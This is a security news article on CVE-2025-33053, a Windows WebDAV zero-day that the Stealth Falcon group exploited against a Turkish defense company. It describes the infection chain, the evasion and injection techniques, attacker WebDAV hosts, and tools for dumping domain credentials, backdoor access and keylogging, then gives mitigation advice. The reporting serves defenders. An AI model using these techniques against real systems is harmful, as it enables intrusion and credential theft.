Microsoft Windows WebDAV 0-Day RCE Vulnerability Actively Exploited in The Wild

A critical zero-day vulnerability in Microsoft Windows, designated CVE-2025-33053, has been actively exploited by the advanced persistent threat (APT) group Stealth Falcon.

The flaw, enabling remote code execution (RCE) through manipulation of a system’s working directory, was addressed by Microsoft in its June 2025 Patch Tuesday updates following CPR’s responsible disclosure. Below is a technical breakdown of the attack and its implications.

Discovery and Exploitation of CVE-2025-33053

In March 2025, CPR identified an attempted cyberattack targeting a Turkish defense company.

The attack leveraged a malicious .url file, likely delivered via spear-phishing emails, to exploit CVE-2025-33053.

This vulnerability allows attackers to manipulate the working directory of legitimate Windows tools, such as iediagcmd.exe, to execute malicious files hosted on an attacker-controlled WebDAV server.

The .url file, named TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url, redirected the execution of iediagcmd.exe to a malicious route.exe on a WebDAV server (summerartcamp[.]net@ssl@443/DavWWWRootOSYxaOjr). 

By altering the working directory, the attacker ensured that Process.Start() prioritized the malicious executable over the legitimate system32 version.

This novel technique, a first for executable-based WebDAV attacks, underscores Stealth Falcon’s innovative approach to exploiting system utilities.

Stealth Falcon, also known as FruityArmor, has been active since at least 2012, targeting government and defense sectors in the Middle East and Africa, including Turkey, Qatar, Egypt, and Yemen.

According to Check Point report, the group is known for acquiring zero-day exploits and deploying sophisticated, custom-built payloads.

Their latest campaign introduces the Horus Agent, a custom implant built on the open-source Mythic C2 framework, named after the Egyptian falcon-headed god.

Infection Chain

1. A phishing email delivers a malicious .url file, often within a ZIP archive, disguised as a legitimate document.
2. This file exploits CVE-2025-33053, manipulating iediagcmd.exe to run a harmful route.exe from a WebDAV server.
3. The attack deploys Horus Loader, a C++-based loader protected by Code Virtualizer, which evades detection through anti-analysis techniques like manual mapping of kernel32.dll and ntdll.dll and scanning for 109 antivirus processes from 17 vendors.
4. It distracts victims by decrypting and displaying a decoy PDF, such as TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.
5. The loader uses IPfuscation to decode a payload from IPv6 addresses, injecting it into msedge.exe using ZwAllocateVirtualMemory, ZwWriteVirtualMemory, and NtResumeThread.
6. The Horus Agent, the final payload, employs custom OLLVM obfuscation with string encryption (shift cipher, -39) and control flow flattening, along with API hashing to resolve imports dynamically.
7. It communicates with command-and-control servers via AES-encrypted HTTP requests, secured with HMAC-SHA256, using up to four domains and a killswitch date of December 31, 2099.
8. Supported commands include system enumeration (survey) and stealthy shellcode injection (shinjectchunked).

The attack employs a multi-stage infection chain involving Spayload, a C++ Mythic implant with advanced capabilities.

Stealth Falcon’s toolkit includes several undocumented tools for post-compromise operations.

The DC Credential Dumper targets NTDS.dit, SAM, and SYSTEM files by accessing a virtual disk at C:ProgramDatads_notifier_0.vhdx using the DiscUtils library, compressing the files into a ZIP archive named ds_notifier_2.vif for exfiltration.

The Passive Backdoor, usrprofscc.exe, is a C-based tool that operates as a service (UsrProfSCC) with admin privileges, listening for AES-encrypted shellcode payloads.

The Custom Keylogger, StatusReport.dll, injects into dxdiag.exe, logging keystrokes to an RC4-encrypted file at C:WindowsTemp~TN%LogName%.tmp.

Mitigation and Recommendations

Microsoft’s patch for CVE-2025-33053 is now available, and organizations are urged to apply it immediately. CPR recommends:

• Patching Systems: Update Windows to mitigate the WebDAV vulnerability.
• Phishing Awareness: Train staff to recognize spear-phishing emails with suspicious attachments or links.
• Network Monitoring: Watch for WebDAV-related traffic to domains like summerartcamp[.]net or mystartupblog.com.
• Endpoint Security: Deploy solutions to detect LOLBin abuse and unauthorized process injections.

The exploitation of CVE-2025-33053 by Stealth Falcon highlights the group’s technical sophistication and focus on high-value targets in the Middle East.

By combining zero-day exploits, custom implants, and evasive techniques, the group poses a significant threat to regional security. Organizations should prioritize patching and proactive monitoring to counter this evolving threat.

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates